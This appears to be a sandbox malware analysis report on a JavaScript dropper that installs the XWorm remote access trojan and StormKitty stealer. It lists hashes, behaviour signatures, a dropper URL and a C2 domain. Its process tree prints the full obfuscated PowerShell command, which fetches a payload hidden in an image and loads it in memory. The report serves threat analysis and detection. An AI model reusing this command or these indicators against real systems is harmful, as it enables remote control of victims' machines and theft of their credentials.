Analysis
-
max time kernel
94s -
max time network
96s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
08-08-2024 01:13
General
-
Target
375d690a75254f5b58018e443205c6800270e553234845d92378b90023c9dc13.js
-
Size
47.0MB
-
MD5
e633eaeb161017eec584bd3f042cde07
-
SHA1
6c0181476a703f2cc7232d62213dbcca8d6d2cf3
-
SHA256
375d690a75254f5b58018e443205c6800270e553234845d92378b90023c9dc13
-
SHA512
605fd043c9978d8f8834bef3a65f07e3513e53c5b2dd15f4a3853fba87e93ae05df4987921e40c9e29c1d8850f3ce090ffce48714601c55bf85eb00c7de5234d
-
SSDEEP
3072:g0SaHey6uGxBKa+OKaGWvPa6Oua6W21lq6+Oq6GWPv6aOu6aW2J5Ka+OKaGWvPak:j
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg
exe.dropper
https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg
Extracted
Family
xworm
Version
5.0
C2
christyrusike21.duckdns.org:7000
Mutex
znkTtudE0WUuGVBW
Attributes
-
install_file
USB.exe
aes.plain
Signatures
-
Detect Xworm Payload 1 IoCs
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
-
Xworm
Xworm is a remote access trojan written in C#.
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Blocklisted process makes network request 2 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 14 IoCs
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\375d690a75254f5b58018e443205c6800270e553234845d92378b90023c9dc13.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J㍥ ␙ ⒡ ⤲ ℺Bp㍥ ␙ ⒡ ⤲ ℺G0㍥ ␙ ⒡ ⤲ ℺YQBn㍥ ␙ ⒡ ⤲ ℺GU㍥ ␙ ⒡ ⤲ ℺VQBy㍥ ␙ ⒡ ⤲ ℺Gw㍥ ␙ ⒡ ⤲ ℺I㍥ ␙ ⒡ ⤲ ℺㍥ ␙ ⒡ ⤲ ℺9㍥ ␙ ⒡ ⤲ ℺C㍥ ␙ ⒡ ⤲ ℺㍥ ␙ ⒡ ⤲ ℺JwBo㍥ ␙ ⒡ ⤲ ℺HQ㍥ ␙ ⒡ ⤲ ℺d㍥ ␙ ⒡ ⤲ ℺Bw㍥ ␙ ⒡ ⤲ ℺HM㍥ ␙ ⒡ ⤲ ℺Og㍥ ␙ ⒡ ⤲ ℺v㍥ ␙ ⒡ ⤲ ℺C8㍥ ␙ ⒡ ⤲ ℺aQBh㍥ ␙ ⒡ ⤲ ℺DY㍥ ␙ ⒡ ⤲ ℺M㍥ ␙ ⒡ ⤲ ℺㍥ ␙ ⒡ ⤲ ℺x㍥ ␙ ⒡ ⤲ ℺DY㍥ ␙ ⒡ ⤲ ℺M㍥ ␙ ⒡ ⤲ ℺㍥ ␙ ⒡ ⤲ ℺2㍥ ␙ ⒡ ⤲ ℺C4㍥ ␙ ⒡ ⤲ ℺dQBz㍥ ␙ ⒡ ⤲ ℺C4㍥ ␙ ⒡ ⤲ ℺YQBy㍥ ␙ ⒡ ⤲ ℺GM㍥ ␙ ⒡ ⤲ ℺a㍥ ␙ ⒡ ⤲ ℺Bp㍥ ␙ ⒡ ⤲ ℺HY㍥ ␙ ⒡ ⤲ ℺ZQ㍥ ␙ ⒡ ⤲ ℺u㍥ ␙ ⒡ ⤲ ℺G8㍥ ␙ ⒡ ⤲ ℺cgBn㍥ ␙ ⒡ ⤲ ℺C8㍥ ␙ ⒡ ⤲ ℺MQ㍥ ␙ ⒡ ⤲ ℺w㍥ ␙ ⒡ ⤲ ℺C8㍥ ␙ ⒡ ⤲ ℺aQB0㍥ ␙ ⒡ ⤲ ℺GU㍥ ␙ ⒡ ⤲ ℺bQBz㍥ ␙ ⒡ ⤲ ℺C8㍥ ␙ ⒡ ⤲ ℺Z㍥ ␙ ⒡ ⤲ ℺Bl㍥ ␙ ⒡ ⤲ ℺GE㍥ ␙ ⒡ ⤲ ℺d㍥ ␙ ⒡ ⤲ ℺Bo㍥ ␙ ⒡ ⤲ ℺G4㍥ ␙ ⒡ ⤲ ℺bwB0㍥ ␙ ⒡ ⤲ ℺GU㍥ ␙ ⒡ ⤲ ℺Xw㍥ ␙ ⒡ ⤲ ℺y㍥ ␙ ⒡ ⤲ ℺D㍥ ␙ ⒡ ⤲ ℺㍥ ␙ ⒡ ⤲ ℺Mg㍥ ␙ ⒡ ⤲ ℺0㍥ ␙ ⒡ ⤲ ℺D㍥ ␙ ⒡ ⤲ ℺㍥ ␙ ⒡ ⤲ ℺Nw㍥ ␙ ⒡ ⤲ ℺v㍥ ␙ ⒡ ⤲ ℺GQ㍥ ␙ ⒡ ⤲ ℺ZQBh㍥ ␙ ⒡ ⤲ ℺HQ㍥ ␙ ⒡ ⤲ ℺a㍥ ␙ ⒡ ⤲ ℺Bu㍥ ␙ ⒡ ⤲ ℺G8㍥ ␙ ⒡ ⤲ ℺d㍥ ␙ ⒡ ⤲ ℺Bl㍥ ␙ ⒡ ⤲ ℺C4㍥ ␙ ⒡ ⤲ ℺agBw㍥ ␙ ⒡ ⤲ ℺Gc㍥ ␙ ⒡ ⤲ ℺Jw㍥ ␙ ⒡ ⤲ ℺7㍥ ␙ ⒡ ⤲ ℺CQ㍥ ␙ ⒡ ⤲ ℺dwBl㍥ ␙ ⒡ ⤲ ℺GI㍥ ␙ ⒡ ⤲ ℺QwBs㍥ ␙ ⒡ ⤲ ℺Gk㍥ ␙ ⒡ ⤲ ℺ZQBu㍥ ␙ ⒡ ⤲ ℺HQ㍥ ␙ ⒡ ⤲ ℺I㍥ ␙ ⒡ ⤲ ℺㍥ ␙ ⒡ ⤲ ℺9㍥ ␙ ⒡ ⤲ ℺C㍥ ␙ ⒡ ⤲ ℺㍥ ␙ ⒡ ⤲ ℺TgBl㍥ ␙ ⒡ ⤲ ℺Hc㍥ ␙ ⒡ ⤲ ℺LQBP㍥ ␙ ⒡ ⤲ ℺GI㍥ ␙ ⒡ ⤲ ℺agBl㍥ ␙ ⒡ ⤲ ℺GM㍥ ␙ ⒡ ⤲ ℺d㍥ ␙ ⒡ ⤲ ℺㍥ ␙ ⒡ ⤲ ℺g㍥ ␙ ⒡ ⤲ ℺FM㍥ ␙ ⒡ ⤲ ℺eQBz㍥ ␙ ⒡ ⤲ ℺HQ㍥ ␙ ⒡ ⤲ ℺ZQBt㍥ ␙ ⒡ ⤲ ℺C4㍥ ␙ ⒡ ⤲ ℺TgBl㍥ ␙ ⒡ ⤲ ℺HQ㍥ ␙ ⒡ ⤲ ℺LgBX㍥ ␙ ⒡ ⤲ ℺GU㍥ ␙ ⒡ ⤲ ℺YgBD㍥ ␙ ⒡ ⤲ ℺Gw㍥ ␙ ⒡ ⤲ ℺aQBl㍥ ␙ ⒡ ⤲ ℺G4㍥ ␙ ⒡ ⤲ ℺d㍥ ␙ ⒡ ⤲ ℺㍥ ␙ ⒡ ⤲ ℺7㍥ ␙ ⒡ ⤲ ℺CQ㍥ ␙ ⒡ ⤲ ℺aQBt㍥ ␙ ⒡ ⤲ ℺GE㍥ ␙ ⒡ ⤲ ℺ZwBl㍥ ␙ ⒡ ⤲ ℺EI㍥ ␙ ⒡ ⤲ ℺eQB0㍥ ␙ ⒡ ⤲ ℺GU㍥ ␙ ⒡ ⤲ ℺cw㍥ ␙ ⒡ ⤲ ℺g㍥ ␙ ⒡ ⤲ ℺D0㍥ ␙ ⒡ ⤲ ℺I㍥ ␙ ⒡ ⤲ ℺㍥ ␙ ⒡ ⤲ ℺k㍥ ␙ ⒡ ⤲ ℺Hc㍥ ␙ ⒡ ⤲ ℺ZQBi㍥ ␙ ⒡ ⤲ ℺EM㍥ ␙ ⒡ ⤲ ℺b㍥ ␙ ⒡ ⤲ ℺Bp㍥ ␙ ⒡ ⤲ ℺GU㍥ ␙ ⒡ ⤲ ℺bgB0㍥ ␙ ⒡ ⤲ ℺C4㍥ ␙ ⒡ ⤲ ℺R㍥ ␙ ⒡ ⤲ ℺Bv㍥ ␙ ⒡ ⤲ ℺Hc㍥ ␙ ⒡ ⤲ ℺bgBs㍥ ␙ ⒡ ⤲ ℺G8㍥ ␙ ⒡ ⤲ ℺YQBk㍥ ␙ ⒡ ⤲ ℺EQ㍥ ␙ ⒡ ⤲ ℺YQB0㍥ ␙ ⒡ ⤲ ℺GE㍥ ␙ ⒡ ⤲ ℺K㍥ ␙ ⒡ ⤲ ℺㍥ ␙ ⒡ ⤲ ℺k㍥ ␙ ⒡ ⤲ ℺Gk㍥ ␙ ⒡ ⤲ ℺bQBh㍥ ␙ ⒡ ⤲ ℺Gc㍥ ␙ ⒡ ⤲ ℺ZQBV㍥ ␙ ⒡ ⤲ ℺HI㍥ ␙ ⒡ ⤲ ℺b㍥ ␙ ⒡ ⤲ ℺㍥ ␙ ⒡ ⤲ ℺p㍥ ␙ ⒡ ⤲ ℺Ds㍥ ␙ ⒡ ⤲ ℺J㍥ ␙ ⒡ ⤲ ℺Bp㍥ ␙ ⒡ ⤲ ℺G0㍥ ␙ ⒡ ⤲ ℺YQBn㍥ ␙ ⒡ ⤲ ℺GU㍥ ␙ ⒡ ⤲ ℺V㍥ ␙ ⒡ ⤲ ℺Bl㍥ ␙ ⒡ ⤲ ℺Hg㍥ ␙ ⒡ ⤲ ℺d㍥ ␙ ⒡ ⤲ ℺㍥ ␙ ⒡ ⤲ ℺g㍥ ␙ ⒡ ⤲ ℺D0㍥ ␙ ⒡ ⤲ ℺I㍥ ␙ ⒡ ⤲ ℺Bb㍥ ␙ ⒡ ⤲ ℺FM㍥ ␙ ⒡ ⤲ ℺eQBz㍥ ␙ ⒡ ⤲ ℺HQ㍥ ␙ ⒡ ⤲ ℺ZQBt㍥ ␙ ⒡ ⤲ ℺C4㍥ ␙ ⒡ ⤲ ℺V㍥ ␙ ⒡ ⤲ ℺Bl㍥ ␙ ⒡ ⤲ ℺Hg㍥ ␙ ⒡ ⤲ ℺d㍥ ␙ ⒡ ⤲ ℺㍥ ␙ ⒡ ⤲ ℺u㍥ ␙ ⒡ ⤲ ℺EU㍥ ␙ ⒡ ⤲ ℺bgBj㍥ ␙ ⒡ ⤲ ℺G8㍥ ␙ ⒡ ⤲ ℺Z㍥ ␙ ⒡ ⤲ ℺Bp㍥ ␙ ⒡ ⤲ ℺G4㍥ ␙ ⒡ ⤲ ℺ZwBd㍥ ␙ ⒡ ⤲ ℺Do㍥ ␙ ⒡ ⤲ ℺OgBV㍥ ␙ ⒡ ⤲ ℺FQ㍥ ␙ ⒡ ⤲ ℺Rg㍥ ␙ ⒡ ⤲ ℺4㍥ ␙ ⒡ ⤲ ℺C4㍥ ␙ ⒡ ⤲ ℺RwBl㍥ ␙ ⒡ ⤲ ℺HQ㍥ ␙ ⒡ ⤲ ℺UwB0㍥ ␙ ⒡ ⤲ ℺HI㍥ ␙ ⒡ ⤲ ℺aQBu㍥ ␙ ⒡ ⤲ ℺Gc㍥ ␙ ⒡ ⤲ ℺K㍥ ␙ ⒡ ⤲ ℺㍥ ␙ ⒡ ⤲ ℺k㍥ ␙ ⒡ ⤲ ℺Gk㍥ ␙ ⒡ ⤲ ℺bQBh㍥ ␙ ⒡ ⤲ ℺Gc㍥ ␙ ⒡ ⤲ ℺ZQBC㍥ ␙ ⒡ ⤲ ℺Hk㍥ ␙ ⒡ ⤲ ℺d㍥ ␙ ⒡ ⤲ ℺Bl㍥ ␙ ⒡ ⤲ ℺HM㍥ ␙ ⒡ ⤲ ℺KQ㍥ ␙ ⒡ ⤲ ℺7㍥ ␙ ⒡ ⤲ ℺CQ㍥ ␙ ⒡ ⤲ ℺cwB0㍥ ␙ ⒡ ⤲ ℺GE㍥ ␙ ⒡ ⤲ ℺cgB0㍥ ␙ ⒡ ⤲ ℺EY㍥ ␙ ⒡ ⤲ ℺b㍥ ␙ ⒡ ⤲ ℺Bh㍥ ␙ ⒡ ⤲ ℺Gc㍥ ␙ ⒡ ⤲ ℺I㍥ ␙ ⒡ ⤲ ℺㍥ ␙ ⒡ ⤲ ℺9㍥ ␙ ⒡ ⤲ ℺C㍥ ␙ ⒡ ⤲ ℺㍥ ␙ ⒡ ⤲ ℺Jw㍥ ␙ ⒡ ⤲ ℺8㍥ ␙ ⒡ ⤲ ℺Dw㍥ ␙ ⒡ ⤲ ℺QgBB㍥ ␙ ⒡ ⤲ ℺FM㍥ ␙ ⒡ ⤲ ℺RQ㍥ ␙ ⒡ ⤲ ℺2㍥ ␙ ⒡ ⤲ ℺DQ㍥ ␙ ⒡ ⤲ ℺XwBT㍥ ␙ ⒡ ⤲ ℺FQ㍥ ␙ ⒡ ⤲ ℺QQBS㍥ ␙ ⒡ ⤲ ℺FQ㍥ ␙ ⒡ ⤲ ℺Pg㍥ ␙ ⒡ ⤲ ℺+㍥ ␙ ⒡ ⤲ ℺Cc㍥ ␙ ⒡ ⤲ ℺Ow㍥ ␙ ⒡ ⤲ ℺k㍥ ␙ ⒡ ⤲ ℺GU㍥ ␙ ⒡ ⤲ ℺bgBk㍥ ␙ ⒡ ⤲ ℺EY㍥ ␙ ⒡ ⤲ ℺b㍥ ␙ ⒡ ⤲ ℺Bh㍥ ␙ ⒡ ⤲ ℺Gc㍥ ␙ ⒡ ⤲ ℺I㍥ ␙ ⒡ ⤲ ℺㍥ ␙ ⒡ ⤲ ℺9㍥ ␙ ⒡ ⤲ ℺C㍥ ␙ ⒡ ⤲ ℺㍥ ␙ ⒡ ⤲ ℺Jw㍥ ␙ ⒡ ⤲ ℺8㍥ ␙ ⒡ ⤲ ℺Dw㍥ ␙ ⒡ ⤲ ℺QgBB㍥ ␙ ⒡ ⤲ ℺FM㍥ ␙ ⒡ ⤲ ℺RQ㍥ ␙ ⒡ ⤲ ℺2㍥ ␙ ⒡ ⤲ ℺DQ㍥ ␙ ⒡ ⤲ ℺XwBF㍥ ␙ ⒡ ⤲ ℺E4㍥ ␙ ⒡ ⤲ ℺R㍥ ␙ ⒡ ⤲ ℺㍥ ␙ ⒡ ⤲ ℺+㍥ ␙ ⒡ ⤲ ℺D4㍥ ␙ ⒡ ⤲ ℺Jw㍥ ␙ ⒡ ⤲ ℺7㍥ ␙ ⒡ ⤲ ℺CQ㍥ ␙ ⒡ ⤲ ℺cwB0㍥ ␙ ⒡ ⤲ ℺GE㍥ ␙ ⒡ ⤲ ℺cgB0㍥ ␙ ⒡ ⤲ ℺Ek㍥ ␙ ⒡ ⤲ ℺bgBk㍥ ␙ ⒡ ⤲ ℺GU㍥ ␙ ⒡ ⤲ ℺e㍥ ␙ ⒡ ⤲ ℺㍥ ␙ ⒡ ⤲ ℺g㍥ ␙ ⒡ ⤲ ℺D0㍥ ␙ ⒡ ⤲ ℺I㍥ ␙ ⒡ ⤲ ℺㍥ ␙ ⒡ ⤲ ℺k㍥ ␙ ⒡ ⤲ ℺Gk㍥ ␙ ⒡ ⤲ ℺bQBh㍥ ␙ ⒡ ⤲ ℺Gc㍥ ␙ ⒡ ⤲ ℺ZQBU㍥ ␙ ⒡ ⤲ ℺GU㍥ ␙ ⒡ ⤲ ℺e㍥ ␙ ⒡ ⤲ ℺B0㍥ ␙ ⒡ ⤲ ℺C4㍥ ␙ ⒡ ⤲ ℺SQBu㍥ ␙ ⒡ ⤲ ℺GQ㍥ ␙ ⒡ ⤲ ℺ZQB4㍥ ␙ ⒡ ⤲ ℺E8㍥ ␙ ⒡ ⤲ ℺Zg㍥ ␙ ⒡ ⤲ ℺o㍥ ␙ ⒡ ⤲ ℺CQ㍥ ␙ ⒡ ⤲ ℺cwB0㍥ ␙ ⒡ ⤲ ℺GE㍥ ␙ ⒡ ⤲ ℺cgB0㍥ ␙ ⒡ ⤲ ℺EY㍥ ␙ ⒡ ⤲ ℺b㍥ ␙ ⒡ ⤲ ℺Bh㍥ ␙ ⒡ ⤲ ℺Gc㍥ ␙ ⒡ ⤲ ℺KQ㍥ ␙ ⒡ ⤲ ℺7㍥ ␙ ⒡ ⤲ ℺CQ㍥ ␙ ⒡ ⤲ ℺ZQBu㍥ ␙ ⒡ ⤲ ℺GQ㍥ ␙ ⒡ ⤲ ℺SQBu㍥ ␙ ⒡ ⤲ ℺GQ㍥ ␙ ⒡ ⤲ ℺ZQB4㍥ ␙ ⒡ ⤲ ℺C㍥ ␙ ⒡ ⤲ ℺㍥ ␙ ⒡ ⤲ ℺PQ㍥ ␙ ⒡ ⤲ ℺g㍥ ␙ ⒡ ⤲ ℺CQ㍥ ␙ ⒡ ⤲ ℺aQBt㍥ ␙ ⒡ ⤲ ℺GE㍥ ␙ ⒡ ⤲ ℺ZwBl㍥ ␙ ⒡ ⤲ ℺FQ㍥ ␙ ⒡ ⤲ ℺ZQB4㍥ ␙ ⒡ ⤲ ℺HQ㍥ ␙ ⒡ ⤲ ℺LgBJ㍥ ␙ ⒡ ⤲ ℺G4㍥ ␙ ⒡ ⤲ ℺Z㍥ ␙ ⒡ ⤲ ℺Bl㍥ ␙ ⒡ ⤲ ℺Hg㍥ ␙ ⒡ ⤲ ℺TwBm㍥ ␙ ⒡ ⤲ ℺Cg㍥ ␙ ⒡ ⤲ ℺J㍥ ␙ ⒡ ⤲ ℺Bl㍥ ␙ ⒡ ⤲ ℺G4㍥ ␙ ⒡ ⤲ ℺Z㍥ ␙ ⒡ ⤲ ℺BG㍥ ␙ ⒡ ⤲ ℺Gw㍥ ␙ ⒡ ⤲ ℺YQBn㍥ ␙ ⒡ ⤲ ℺Ck㍥ ␙ ⒡ ⤲ ℺Ow㍥ ␙ ⒡ ⤲ ℺k㍥ ␙ ⒡ ⤲ ℺HM㍥ ␙ ⒡ ⤲ ℺d㍥ ␙ ⒡ ⤲ ℺Bh㍥ ␙ ⒡ ⤲ ℺HI㍥ ␙ ⒡ ⤲ ℺d㍥ ␙ ⒡ ⤲ ℺BJ㍥ ␙ ⒡ ⤲ ℺G4㍥ ␙ ⒡ ⤲ ℺Z㍥ ␙ ⒡ ⤲ ℺Bl㍥ ␙ ⒡ ⤲ ℺Hg㍥ ␙ ⒡ ⤲ ℺I㍥ ␙ ⒡ ⤲ ℺㍥ ␙ ⒡ ⤲ ℺t㍥ ␙ ⒡ ⤲ ℺Gc㍥ ␙ ⒡ ⤲ ℺ZQ㍥ ␙ ⒡ ⤲ ℺g㍥ ␙ ⒡ ⤲ ℺D㍥ ␙ ⒡ ⤲ ℺㍥ ␙ ⒡ ⤲ ℺I㍥ ␙ ⒡ ⤲ ℺㍥ ␙ ⒡ ⤲ ℺t㍥ ␙ ⒡ ⤲ ℺GE㍥ ␙ ⒡ ⤲ ℺bgBk㍥ ␙ ⒡ ⤲ ℺C㍥ ␙ ⒡ ⤲ ℺㍥ ␙ ⒡ ⤲ ℺J㍥ ␙ ⒡ ⤲ ℺Bl㍥ ␙ ⒡ ⤲ ℺G4㍥ ␙ ⒡ ⤲ ℺Z㍥ ␙ ⒡ ⤲ ℺BJ㍥ ␙ ⒡ ⤲ ℺G4㍥ ␙ ⒡ ⤲ ℺Z㍥ ␙ ⒡ ⤲ ℺Bl㍥ ␙ ⒡ ⤲ ℺Hg㍥ ␙ ⒡ ⤲ ℺I㍥ ␙ ⒡ ⤲ ℺㍥ ␙ ⒡ ⤲ ℺t㍥ ␙ ⒡ ⤲ ℺Gc㍥ ␙ ⒡ ⤲ ℺d㍥ ␙ ⒡ ⤲ ℺㍥ ␙ ⒡ ⤲ ℺g㍥ ␙ ⒡ ⤲ ℺CQ㍥ ␙ ⒡ ⤲ ℺cwB0㍥ ␙ ⒡ ⤲ ℺GE㍥ ␙ ⒡ ⤲ ℺cgB0㍥ ␙ ⒡ ⤲ ℺Ek㍥ ␙ ⒡ ⤲ ℺bgBk㍥ ␙ ⒡ ⤲ ℺GU㍥ ␙ ⒡ ⤲ ℺e㍥ ␙ ⒡ ⤲ ℺㍥ ␙ ⒡ ⤲ ℺7㍥ ␙ ⒡ ⤲ ℺CQ㍥ ␙ ⒡ ⤲ ℺cwB0㍥ ␙ ⒡ ⤲ ℺GE㍥ ␙ ⒡ ⤲ ℺cgB0㍥ ␙ ⒡ ⤲ ℺Ek㍥ ␙ ⒡ ⤲ ℺bgBk㍥ ␙ ⒡ ⤲ ℺GU㍥ ␙ ⒡ ⤲ ℺e㍥ ␙ ⒡ ⤲ ℺㍥ ␙ ⒡ ⤲ ℺g㍥ ␙ ⒡ ⤲ ℺Cs㍥ ␙ ⒡ ⤲ ℺PQ㍥ ␙ ⒡ ⤲ ℺g㍥ ␙ ⒡ ⤲ ℺CQ㍥ ␙ ⒡ ⤲ ℺cwB0㍥ ␙ ⒡ ⤲ ℺GE㍥ ␙ ⒡ ⤲ ℺cgB0㍥ ␙ ⒡ ⤲ ℺EY㍥ ␙ ⒡ ⤲ ℺b㍥ ␙ ⒡ ⤲ ℺Bh㍥ ␙ ⒡ ⤲ ℺Gc㍥ ␙ ⒡ ⤲ ℺LgBM㍥ ␙ ⒡ ⤲ ℺GU㍥ ␙ ⒡ ⤲ ℺bgBn㍥ ␙ ⒡ ⤲ ℺HQ㍥ ␙ ⒡ ⤲ ℺a㍥ ␙ ⒡ ⤲ ℺㍥ ␙ ⒡ ⤲ ℺7㍥ ␙ ⒡ ⤲ ℺CQ㍥ ␙ ⒡ ⤲ ℺YgBh㍥ ␙ ⒡ ⤲ ℺HM㍥ ␙ ⒡ ⤲ ℺ZQ㍥ ␙ ⒡ ⤲ ℺2㍥ ␙ ⒡ ⤲ ℺DQ㍥ ␙ ⒡ ⤲ ℺T㍥ ␙ ⒡ ⤲ ℺Bl㍥ ␙ ⒡ ⤲ ℺G4㍥ ␙ ⒡ ⤲ ℺ZwB0㍥ ␙ ⒡ ⤲ ℺Gg㍥ ␙ ⒡ ⤲ ℺I㍥ ␙ ⒡ ⤲ ℺㍥ ␙ ⒡ ⤲ ℺9㍥ ␙ ⒡ ⤲ ℺C㍥ ␙ ⒡ ⤲ ℺㍥ ␙ ⒡ ⤲ ℺J㍥ ␙ ⒡ ⤲ ℺Bl㍥ ␙ ⒡ ⤲ ℺G4㍥ ␙ ⒡ ⤲ ℺Z㍥ ␙ ⒡ ⤲ ℺BJ㍥ ␙ ⒡ ⤲ ℺G4㍥ ␙ ⒡ ⤲ ℺Z㍥ ␙ ⒡ ⤲ ℺Bl㍥ ␙ ⒡ ⤲ ℺Hg㍥ ␙ ⒡ ⤲ ℺I㍥ ␙ ⒡ ⤲ ℺㍥ ␙ ⒡ ⤲ ℺t㍥ ␙ ⒡ ⤲ ℺C㍥ ␙ ⒡ ⤲ ℺㍥ ␙ ⒡ ⤲ ℺J㍥ ␙ ⒡ ⤲ ℺Bz㍥ ␙ ⒡ ⤲ ℺HQ㍥ ␙ ⒡ ⤲ ℺YQBy㍥ ␙ ⒡ ⤲ ℺HQ㍥ ␙ ⒡ ⤲ ℺SQBu㍥ ␙ ⒡ ⤲ ℺GQ㍥ ␙ ⒡ ⤲ ℺ZQB4㍥ ␙ ⒡ ⤲ ℺Ds㍥ ␙ ⒡ ⤲ ℺J㍥ ␙ ⒡ ⤲ ℺Bi㍥ ␙ ⒡ ⤲ ℺GE㍥ ␙ ⒡ ⤲ ℺cwBl㍥ ␙ ⒡ ⤲ ℺DY㍥ ␙ ⒡ ⤲ ℺N㍥ ␙ ⒡ ⤲ ℺BD㍥ ␙ ⒡ ⤲ ℺G8㍥ ␙ ⒡ ⤲ ℺bQBt㍥ ␙ ⒡ ⤲ ℺GE㍥ ␙ ⒡ ⤲ ℺bgBk㍥ ␙ ⒡ ⤲ ℺C㍥ ␙ ⒡ ⤲ ℺㍥ ␙ ⒡ ⤲ ℺PQ㍥ ␙ ⒡ ⤲ ℺g㍥ ␙ ⒡ ⤲ ℺CQ㍥ ␙ ⒡ ⤲ ℺aQBt㍥ ␙ ⒡ ⤲ ℺GE㍥ ␙ ⒡ ⤲ ℺ZwBl㍥ ␙ ⒡ ⤲ ℺FQ㍥ ␙ ⒡ ⤲ ℺ZQB4㍥ ␙ ⒡ ⤲ ℺HQ㍥ ␙ ⒡ ⤲ ℺LgBT㍥ ␙ ⒡ ⤲ ℺HU㍥ ␙ ⒡ ⤲ ℺YgBz㍥ ␙ ⒡ ⤲ ℺HQ㍥ ␙ ⒡ ⤲ ℺cgBp㍥ ␙ ⒡ ⤲ ℺G4㍥ ␙ ⒡ ⤲ ℺Zw㍥ ␙ ⒡ ⤲ ℺o㍥ ␙ ⒡ ⤲ ℺CQ㍥ ␙ ⒡ ⤲ ℺cwB0㍥ ␙ ⒡ ⤲ ℺GE㍥ ␙ ⒡ ⤲ ℺cgB0㍥ ␙ ⒡ ⤲ ℺Ek㍥ ␙ ⒡ ⤲ ℺bgBk㍥ ␙ ⒡ ⤲ ℺GU㍥ ␙ ⒡ ⤲ ℺e㍥ ␙ ⒡ ⤲ ℺㍥ ␙ ⒡ ⤲ ℺s㍥ ␙ ⒡ ⤲ ℺C㍥ ␙ ⒡ ⤲ ℺㍥ ␙ ⒡ ⤲ ℺J㍥ ␙ ⒡ ⤲ ℺Bi㍥ ␙ ⒡ ⤲ ℺GE㍥ ␙ ⒡ ⤲ ℺cwBl㍥ ␙ ⒡ ⤲ ℺DY㍥ ␙ ⒡ ⤲ ℺N㍥ ␙ ⒡ ⤲ ℺BM㍥ ␙ ⒡ ⤲ ℺GU㍥ ␙ ⒡ ⤲ ℺bgBn㍥ ␙ ⒡ ⤲ ℺HQ㍥ ␙ ⒡ ⤲ ℺a㍥ ␙ ⒡ ⤲ ℺㍥ ␙ ⒡ ⤲ ℺p㍥ ␙ ⒡ ⤲ ℺Ds㍥ ␙ ⒡ ⤲ ℺J㍥ ␙ ⒡ ⤲ ℺Bj㍥ ␙ ⒡ ⤲ ℺G8㍥ ␙ ⒡ ⤲ ℺bQBt㍥ ␙ ⒡ ⤲ ℺GE㍥ ␙ ⒡ ⤲ ℺bgBk㍥ ␙ ⒡ ⤲ ℺EI㍥ ␙ ⒡ ⤲ ℺eQB0㍥ ␙ ⒡ ⤲ ℺GU㍥ ␙ ⒡ ⤲ ℺cw㍥ ␙ ⒡ ⤲ ℺g㍥ ␙ ⒡ ⤲ ℺D0㍥ ␙ ⒡ ⤲ ℺I㍥ ␙ ⒡ ⤲ ℺Bb㍥ ␙ ⒡ ⤲ ℺FM㍥ ␙ ⒡ ⤲ ℺eQBz㍥ ␙ ⒡ ⤲ ℺HQ㍥ ␙ ⒡ ⤲ ℺ZQBt㍥ ␙ ⒡ ⤲ ℺C4㍥ ␙ ⒡ ⤲ ℺QwBv㍥ ␙ ⒡ ⤲ ℺G4㍥ ␙ ⒡ ⤲ ℺dgBl㍥ ␙ ⒡ ⤲ ℺HI㍥ ␙ ⒡ ⤲ ℺d㍥ ␙ ⒡ ⤲ ℺Bd㍥ ␙ ⒡ ⤲ ℺Do㍥ ␙ ⒡ ⤲ ℺OgBG㍥ ␙ ⒡ ⤲ ℺HI㍥ ␙ ⒡ ⤲ ℺bwBt㍥ ␙ ⒡ ⤲ ℺EI㍥ ␙ ⒡ ⤲ ℺YQBz㍥ ␙ ⒡ ⤲ ℺GU㍥ ␙ ⒡ ⤲ ℺Ng㍥ ␙ ⒡ ⤲ ℺0㍥ ␙ ⒡ ⤲ ℺FM㍥ ␙ ⒡ ⤲ ℺d㍥ ␙ ⒡ ⤲ ℺By㍥ ␙ ⒡ ⤲ ℺Gk㍥ ␙ ⒡ ⤲ ℺bgBn㍥ ␙ ⒡ ⤲ ℺Cg㍥ ␙ ⒡ ⤲ ℺J㍥ ␙ ⒡ ⤲ ℺Bi㍥ ␙ ⒡ ⤲ ℺GE㍥ ␙ ⒡ ⤲ ℺cwBl㍥ ␙ ⒡ ⤲ ℺DY㍥ ␙ ⒡ ⤲ ℺N㍥ ␙ ⒡ ⤲ ℺BD㍥ ␙ ⒡ ⤲ ℺G8㍥ ␙ ⒡ ⤲ ℺bQBt㍥ ␙ ⒡ ⤲ ℺GE㍥ ␙ ⒡ ⤲ ℺bgBk㍥ ␙ ⒡ ⤲ ℺Ck㍥ ␙ ⒡ ⤲ ℺Ow㍥ ␙ ⒡ ⤲ ℺k㍥ ␙ ⒡ ⤲ ℺Gw㍥ ␙ ⒡ ⤲ ℺bwBh㍥ ␙ ⒡ ⤲ ℺GQ㍥ ␙ ⒡ ⤲ ℺ZQBk㍥ ␙ ⒡ ⤲ ℺EE㍥ ␙ ⒡ ⤲ ℺cwBz㍥ ␙ ⒡ ⤲ ℺GU㍥ ␙ ⒡ ⤲ ℺bQBi㍥ ␙ ⒡ ⤲ ℺Gw㍥ ␙ ⒡ ⤲ ℺eQ㍥ ␙ ⒡ 